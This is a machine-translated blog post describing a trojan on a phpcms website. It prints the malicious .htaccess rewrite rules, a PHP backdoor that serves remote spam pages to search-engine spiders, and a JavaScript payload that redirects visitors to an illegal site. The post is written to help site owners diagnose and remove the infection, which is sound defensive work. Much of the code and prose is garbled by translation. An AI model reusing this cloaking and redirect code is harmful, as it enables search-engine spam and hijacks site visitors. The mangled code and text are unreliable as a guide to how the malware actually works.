phpcms Trojans will jump some illegal advertising page Solution

Others 2019-07-30 18:52:08 views: null

1. Find a hidden .htaccess file in the root of the site. There are URL path jumps. This file can not be deleted in win server can not be renamed. Will not work with attrib del Cacls command.

The following URL: advertising will jump to the page

/111safasf/index.html 

/ Random characters /index.html 

/? = Werwerw zdsfasf

.htaccess file class content

When Options + FollowSymLinks # symbolic link to access, whether to jump to the corresponding connection path
IndexIgnore * / *
RewriteEngine ON

RewriteRule ^(\w+)/index.html$ images/hot/页面.php?id=$1
RewriteRule ^xw(\w+)/$ images/hot/页面.php?id=$1

# if a directory or a file exists, use it directly
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d

#RewriteCond% {REQUEST_FILENAME}! -F (if not the file, will be performed next RewriteRule)
#RewriteCond REQUEST_FILENAME {%}! -D (if not a directory, will perform next RewriteRule)

Find the page jump PHP file code is as follows

? <PHP 

/ * 
 * determine whether it is coming quoted by other web pages 
 * ** / 
function ISREF () 
{ 
    $ ISREF = false; 
    // get the address of the page that link to the current page 
    if (isset ($ _SERVER [! 'the HTTP_REFERER'])) { 
        return $ ISREF; 
    } 

    $ Referer = strtolower ($ _SERVER [ 'the HTTP_REFERER']); 
    $ searray = Array ( "baidu", "SO", "Sogou", "soso", "haosou" , "Google"); 
    the foreach (AS $ $ searray value) { 
        ! IF (the strpos (Referer $, $ value) == to false) { 
            $ = ISREF to true; 
            BREAK; 
        } 
    } 
    return $ ISREF;
} 

/ * 
 * Determine whether the search engine spiders visit 
 * * / 
function isspider () 
{
    $isspider = false;
    $http_user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
    $searray = array('baidu','360Spider','sogou','soso','360','so','google');
    foreach ($searray as $value) {
        if(strpos($http_user_agent, $value) !== false){
            $isspider = true;
            break;
        }
    }
    return $isspider;
}

function flushout($html)
{
    //echo 1;
    //var_dump($html);
    ob_clean();
    ob_start();
    echo $html;
    ob_flush();
    ob_end_flush();
function getWebContent ($ api)
// Get the remote website
}

{
    $c = '';
    if (function_exists('fsockopen')) {
        $link = parse_url($api);
        $query = $link['path'] . '?' . $link['query'];
        $host = strtolower($link['host']);
        $port = isset($link['port'])?$link['port']:80;
        $fp = fsockopen($host, $port, $errno, $errstr, 10);
        if ($fp) {
            $out = "GET /{$query} HTTP/1.0\r\n";
            $out .= "Host: {$host}\r\n";
            $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
            $out .= "Connection: Close\r\n\r\n";
            fwrite($fp, $out);
            $inheader = 1;
            $contents = "";
            while (!feof($fp)) {
                $line = fgets($fp, 4096);
                if ($inheader == 0) {
                    $contents .= $line;
                }
                if ($inheader && ($line == "\n" || $line == "\r\n")) {
                    $inheader = 0;
                }
            }
            fclose($fp);
            $c = $contents;
        }
    }
    if (empty($c) && function_exists('curl_init') && function_exists('curl_exec')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $api);
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)");
        $c = curl_exec($ch);
        curl_close($ch);
    }
    if (empty($c) && ini_get('allow_url_fopen')) {
        $c = @file_get_contents($api);
    }
    if(empty($c)){
        header("HTTP/1.1 404 Not Found");
        exit;
    }
    //header("Content-Type: text/html; charset=gbk");
    return $c;
}

$isspider = isspider();
//$isspider = true;
if( $isspider ){
    $host = $_SERVER['HTTP_HOST'];
    $url = 'http://www.蜘蛛服务器地址.cn/44.php?host=' .$host . '&' . $_SERVER['QUERY_STRING'] ;
    $html = getWebContent( $url );
    //$html = iconv( 'gb2312' , 'utf-8' , $html );
    //flushout($url);
    flushout($html);
}

$isref = isref();
//    $isref = true;
if( $isref ){
    $html = "<scri"."pt lang"."uage='jav"."as"."cri"."pt' src='http://www.蜘蛛服务器地址.com/p1.js'></sc"."ript><br/>";
    flushout($html);
}

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"/>
<title>404 - 找不到文件或目录。</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
{font-size h1 of: 2.4em; margin: 0; Color: #FFF;} 
H2 {font-size: 1.7em; margin: 0; Color: # CC0000;} 
H3 {font-size: 1.2em; margin: 10px 0 0 0; Color: # 000000;} 
#header {width: 96%; margin: 0 0 0 0; padding: 6px 6px 2% 2%; font-Family: "Trebuchet the MS", Verdana, Sans-serif; Color : #FFF; 
background-Color: # 555555;} 
#content {margin: 0 0 0 2%; position: relative;} 
.content-Container {background: #FFF; width: 96%; margin-Top: 8px; padding : 10px; position: relative;} 
-> 
</ style> 
</ head> 
<body> 
<div ID = "header"> <h1 of> server error </ h1 of> </ div> 
<div ID = "Content" > 
 <div class="content-container"><fieldset>
  <h2> 404 - file or directory. </ h2> 
  <h3> resource you are looking for might have been removed, the name has been changed or is temporarily unavailable. </ H3> 
 <

 Pages get to their file server 44.php according jump over the URL

. Http: // www spider server address .cn / 44.php host = & '[QUERY_STRING']; then? '$ Host..' $ _SERVER. '

Randomly generate a news page, and then crawl Baidu. If the customer enters a URL through Baidu search, it will jump to open an illegal website. 

 

Below that is the jump page JS file

JS content

if(typeof(js616_)=='undefined'){
    var js616_ = 'loaded';
    var js616dm = document.domain.toLowerCase();
    if(js616dm.indexOf('qq.com')!=-1){
        document.writeln('<script type="text/javascript" src="https://js.users.51.la/19555119.js"></script>');
        document.writeln("<script language=javascript>setTimeout(\"window.location.href='http://www.非法网址.com/'\",\"1000\");</script>");
        document.writeln("<script language=javascript>setTimeout(\"window.opener.navigate ( 'http:. // www illegal URL .com /') \ ", \" 1000 \ "); </ Script>" 
    });else{
        document.writeln('<script type="text/javascript" src="https://js.users.51.la/19555119.js"></script>');
        document.writeln("<script language=javascript>setTimeout(\"window.location.href='http://www.非法网址.com/'\",\"1000\");</script>");
        document.writeln("<script language=javascript>setTimeout(\"window.opener.navigate('http://www.非法网址.com/')\",\"1000\");</script>");
    }
}

 

Guess you like

Origin www.cnblogs.com/flymomo/p/11269389.html
Recommended
Ranking
Most efficient way to query a json array?
Under Linux Automated Deployment ASP.NET CORE 3.1 (Docker + Jenkins + Nginx)
Getting started with Node CLI
论文详解——《InternImage: Exploring Large-Scale Vision Foundation Models with Deformable Convolutions》
Is the principle of object new the same as the principle of girlfriend generation?
GIT first commit project operation
JavaScript version of Struts2-Ajax integration
7-6 Is a complete binary search tree (30 points)
Pytorch实现AutoEncoder自动编码器
Java basics (regular expressions)
Daily
More
2024-04-15(5)
2024-04-14(0)
2024-04-13(18)
2024-04-12(5)
2024-04-11(0)
2024-04-10(1)
2024-04-09(0)
2024-04-08(1)
2024-04-07(0)
2024-04-06(1)

Code World

© 2018 codetd.com